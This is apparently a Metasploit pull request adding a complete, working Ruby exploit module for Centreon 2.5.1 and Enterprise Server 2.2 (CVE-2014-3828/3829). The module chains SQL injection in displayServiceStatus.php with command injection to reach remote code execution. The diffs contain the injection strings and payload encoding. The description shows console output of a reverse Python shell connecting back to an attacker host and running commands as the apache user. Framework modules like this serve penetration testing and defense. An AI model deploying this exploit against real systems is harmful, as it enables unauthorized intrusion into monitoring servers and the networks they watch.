### PR TITLE
Exploit for CVE-2014-3828 and CVE-2014-3829, Centreon Injections

### DIFF
--- a/modules/exploits/linux/http/centreon_sqli_exec.rb
+++ b/modules/exploits/linux/http/centreon_sqli_exec.rb
@@ -15,11 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'Centreon SQL and Command Injection',
       'Description'    => %q{
         This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
-        Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
-        displayServiceStatus.php component, allows remote unauthenticated execution of arbitrary
-        commands. The module only requires a session available in the application at the moment
-        of exploitation. It means a legit ust must be logged in. This module has been tested
-        successfully on Centreon Enterprise Server 2.2.
+        Enterprise Server 2.2 and prior. The combination of both vulnerabilities, SQL and
+        Command injections in the displayServiceStatus.php component, allows remote attackers
+        to execute arbitrary commands. No authentication is required. The module only requires
+        a valid session available at the moment of exploitation. It means a legit ust must be
+        logged in. This module has been tested successfully on Centreon Enterprise Server 2.2.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/linux/http/centreon_sqli_exec.rb
+++ b/modules/exploits/linux/http/centreon_sqli_exec.rb
@@ -16,21 +16,23 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
         Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
-        displayServiceStatus.php component, allow to remote unauthenticated execution of
-        arbitrary commands. The module only requires a session available in the application
-        at the moment of exploitation. This module has been tested successfully on Centreon
-        Enterprise Server 2.2.
+        displayServiceStatus.php component, allows remote unauthenticated execution of arbitrary
+        commands. The module only requires a session available in the application at the moment
+        of exploitation. It means a legit ust must be logged in. This module has been tested
+        successfully on Centreon Enterprise Server 2.2.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Tom MaZ', # Vulnerability Discovery
+          'MaZ', # Vulnerability Discovery and Analysis
           'juan vazquez' # Metasploit Module
         ],
       'References'     =>
         [
           ['CVE', '2014-3828'],
-          ['CVE', '2014-3829']
+          ['CVE', '2014-3829'],
+          ['US-CERT-VU', '298796'],
+          ['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
         ],
       'Arch'           => ARCH_CMD,
       'Platform'       => 'unix',
@@ -84,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if check == Exploit::CheckCode::Safe
       fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
     elsif check == Exploit::CheckCode::Detected
-      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited or you just need to wait until someone logged in")
+      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited, maybe you just need to wait until someone logs in")
     end
 
     print_status("#{peer} - Exploiting...")
@@ -93,6 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
     session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
     template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
     res = send_template_id(session_injection, template_injection)
+
     if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
       vprint_status("Output: #{res.body}")
     end

--- a/modules/exploits/linux/http/centreon_sqli_exec.rb
+++ b/modules/exploits/linux/http/centreon_sqli_exec.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Centreon SQL and Command Injection',
+      'Description'    => %q{
+        This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
+        Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
+        displayServiceStatus.php component, allow to remote unauthenticated execution of
+        arbitrary commands. The module only requires a session available in the application
+        at the moment of exploitation. This module has been tested successfully on Centreon
+        Enterprise Server 2.2.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Tom MaZ', # Vulnerability Discovery
+          'juan vazquez' # Metasploit Module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-3828'],
+          ['CVE', '2014-3829']
+        ],
+      'Arch'           => ARCH_CMD,
+      'Platform'       => 'unix',
+      'Payload'        =>
+        {
+          'Space'       => 1500, # having into account 8192 as max URI length
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd cmd_bash',
+              'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl'
+            }
+        },
+      'Targets'        =>
+        [
+          ['Centreon Enterprise Server 2.2', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Oct 15 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon'])
+      ], self.class)
+  end
+
+  def check
+    random_id = rand_text_numeric(5 + rand(8))
+    res = send_session_id(random_id)
+
+    unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
+      return Exploit::CheckCode::Safe
+    end
+
+    injection = "#{random_id}' or 'a'='a"
+    res = send_session_id(injection)
+
+    if res && res.code == 200
+      if res.body && res.body.to_s =~ /sh: graph: command not found/
+        return Exploit::CheckCode::Vulnerable
+      elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
+        return Exploit::CheckCode::Detected
+      end
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
+    elsif check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited or you just need to wait until someone logged in")
+    end
+
+    print_status("#{peer} - Exploiting...")
+    random_id = rand_text_numeric(5 + rand(8))
+    random_char = rand_text_alphanumeric(1)
+    session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
+    template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
+    res = send_template_id(session_injection, template_injection)
+    if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
+      vprint_status("Output: #{res.body}")
+    end
+  end
+
+  def send_session_id(session_id)
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
+      'vars_get' =>
+        {
+          'session_id' => session_id
+        }
+    )
+
+    res
+  end
+
+  def send_template_id(session_id, template_id)
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
+      'vars_get' =>
+        {
+          'session_id' => session_id,
+          'template_id' => template_id
+        }
+      }, 3)
+
+    res
+  end
+
+  def mysql_payload
+    p = ''
+    payload.encoded.each_byte { |c| p << "#{c},"}
+    p
+  end
+
+end


### PR DESCRIPTION
Tested with Centreon Enterprise Server version 2.2. I've used the ces-standard-2.2-i386.iso ISO: http://download.centreon.com/index.php?id=4266

My md5: MD5 (ces-standard-2.2-i386.iso) = 618e3ae33b7d97d724f2e842d1e634ff
## Verification
- [x] Deploy the Centreon Enterprise Server 2.2 from the iso above
- [x] Try the module with anyone logged into centreon, your result should be like the next one (you SHOULDN'T get a session):

```
msf exploit(centreon_sqli_exec) > check
[*] 172.16.158.224:80 - The target service is running, but could not be validated.
msf exploit(centreon_sqli_exec) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[-] Exploit failed: 172.16.158.224:80 - The SQLi cannot be exploited, maybe you just need to wait until someone logs in
[*] Exploit completed, but no session was created.
```
- [x] Initi a session on the Centreon web application (just do a log in).
- [x] Use the module again, like shown below, verify sessions!

```
msf exploit(centreon_sqli_exec) > check
[+] 172.16.158.224:80 - The target is vulnerable.
msf exploit(centreon_sqli_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(centreon_sqli_exec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(centreon_sqli_exec) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.224:80 - Exploiting...

bash: no job control in this shell
bash-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache),101(nagios),102(centreon),103(centreon-broker),105(centreon-engine)
bash-3.2$ exit
exit
^C
Abort session 1? [y/N]  y
```
